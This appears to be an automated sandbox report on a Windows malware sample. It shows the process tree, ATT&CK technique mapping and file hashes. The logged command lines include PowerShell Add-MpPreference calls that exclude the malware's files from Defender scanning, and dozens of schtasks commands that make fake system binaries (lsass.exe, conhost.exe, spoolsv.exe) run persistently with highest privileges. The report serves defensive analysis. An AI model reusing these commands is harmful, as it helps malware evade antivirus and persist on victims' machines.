        Suspicious use of AdjustPrivilegeToken
        
        PID:2160
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\es-ES\conhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2256
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\conhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1108
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\SendTo\conhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:388
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\schtasks.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\lsass.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1444
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2908
      - C:\Users\Admin\conhost.exe
        
        "C:\Users\Admin\conhost.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1168
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat"
        7⤵
        
        PID:3040
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:396
        
        C:\Users\Admin\conhost.exe
        
        "C:\Users\Admin\conhost.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2932
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qRj2XQE6t6.bat"
        9⤵
        
        PID:596
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        10⤵
        
        PID:2960
        
        C:\Users\Admin\conhost.exe
        
        "C:\Users\Admin\conhost.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2200
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pFE2FgvhS1.bat"
        11⤵
        
        PID:2420
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:2240
        
        C:\Users\Admin\conhost.exe
        
        "C:\Users\Admin\conhost.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GUMorhJGzB.bat"
        13⤵
        
        PID:2488
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        14⤵
        
        PID:1660
        
        C:\Users\Admin\conhost.exe
        
        "C:\Users\Admin\conhost.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2100
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lAZRwHYzWc.bat"
        15⤵
        
        PID:2708
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        16⤵
        
        PID:844
        
        C:\Users\Admin\conhost.exe
        
        "C:\Users\Admin\conhost.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BYj1kG62r9.bat"
        17⤵
        
        PID:2448
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        18⤵
        
        PID:2164
        
        C:\Users\Admin\conhost.exe
        
        "C:\Users\Admin\conhost.exe"
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tbw0avzYF4.bat"
        19⤵
        
        PID:2528
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        20⤵
        
        PID:2776
        
        C:\Users\Admin\conhost.exe
        
        "C:\Users\Admin\conhost.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1844
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OTxxDhnLNa.bat"
        21⤵
        
        PID:2940
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        22⤵
        
        PID:2816
        
        C:\Users\Admin\conhost.exe
        
        "C:\Users\Admin\conhost.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\Program Files\MSBuild\Microsoft\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\providercommon\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\providercommon\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\providercommon\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\providercommon\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\providercommon\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\providercommon\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\OSPPSVC.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 9 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OSPPSVC.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Default User\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Documents\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\All Users\Documents\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Documents\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Windows\es-ES\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\es-ES\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\es-ES\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Admin\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\SendTo\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Admin\SendTo\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\SendTo\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Portable Devices\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Portable Devices\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\schtasks.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Desktop\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\lsass.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Desktop\lsass.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:3048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\powershell.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\powershell.exe'" /rl HIGHEST /f
1⤵
PID:2440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\powershell.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:3020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
24855ec6ac5864fe21e5cc22b43cd9ce

SHA1
5943561dd0c21409fb5c1fe659576715666cf6b0

SHA256
b66dc4435c82da8496b2ceb6df3f26a64d76730f464a89a3ed10870dfdb332ad

SHA512
168cde5106700f047d07dab21ddc96023fa526e5b40dde5e7edf387af121546a62127af826f84d798a62d53e89777f94022aedfce2f38d32ac1b22eb37e6a35d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3c0880566d1fbcd37bd453c1bd345990

SHA1
d40e447e4534e7ff020db3231108585425718e88

SHA256
7cac19670ed1fc8ffd10da93145b1448eac5752bb64d2cdebbcaad2fb6045557

SHA512
549d1e1587432fa497c04e9917021fd9ea23683ccbe8e58668932580472f9bb07e70ffaa3ccb6b31fb0484971d8bedaf802a4b94dfdc3bd728e439c145107c6f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ecab5797974702f0664aadd42f49c910

SHA1
ec8e030e0b7731d45e57659cc12dc54e50cc9e7d

SHA256
174907795cb75c6744251e999f5131ef4d660c9ecaed71863406102226d8a5a6

SHA512
bdc4f4adf03004e1381e803442d0fe47ed2e1776a3a9624b8a0e020534844cf75a8200a949522fb4ea54b9c009307849dd0d685dc0b3f6393f84376e5d237536

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
938ed4e2f308ccf2f11fecedb2a7a812

SHA1
c92130b32e0513e7f0c0bacfeff625356495628a

SHA256
8990b4cd4b67e49bb6764dd4eea26fa27ac037bd8a97e420b606a73ef2b6f4f1

SHA512
6e858ad02e47c45b19e32e3d3e9f19e9bf975611e4e175f5196729b55e24f600939456031855cc2b3a3e7c0b050216e9680000dffededbd9f10b72c8fdcc127d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
06a8d741f50650abcf6addf1523ae8c8

SHA1
9cb88c1c328b39b94fdf8d9fb596f61aa83c8bc5

SHA256
32f9308b12ca5940590c55c187fd0ef4b9682ae4ffe9aadeccc57aabc3bfcfeb

SHA512
8746e56f26b8acff8946429159dce77afd3ab955ed829a9447bff6ce993885cfbae99198c2b9998446cac49c3b580502bf2464c3fb0c6dececce4e63b44cfb93

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
575f0a4398bd4521e33de78146494962

SHA1
bae3d7b7cb14c1cfc0670219387c2ede18e699eb

SHA256
4f6bfaa783da361a517f482e11c6f0cdd32a8f06edd1fbbfdf000148bcc170a4

SHA512
ed270ac13dae64bddf52e7952b9067f72d3c858f8a18dcc585f34104a5e425e8b2eee49531ce50d4b7e6e9a61a21ffc661f8c53a20fd05436c84f3b16cd0f9b8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
abf592ef0ea057fc57de53096dea543b

SHA1
064630d93017c33aa1225a3adab43622900bcf17

SHA256
ba2d0619a79fd48d56a239c8fbeb8b8508b49e02b9f0c2a75d9d63d39dc89876

SHA512
a4bfb0fae4511ffa91ecdd260e61ade13253e26ad97e808c39e5471bcff78a95efb782e7a1d2ed18bdc5663a5629d9b4a10d42f05d13d950e1ff9baaf6220b58

Download Submit
C:\Users\Admin\AppData\Local\Temp\BYj1kG62r9.bat

Filesize
191B

MD5
8919cd979b0bd1f983b13edbc1637358

SHA1
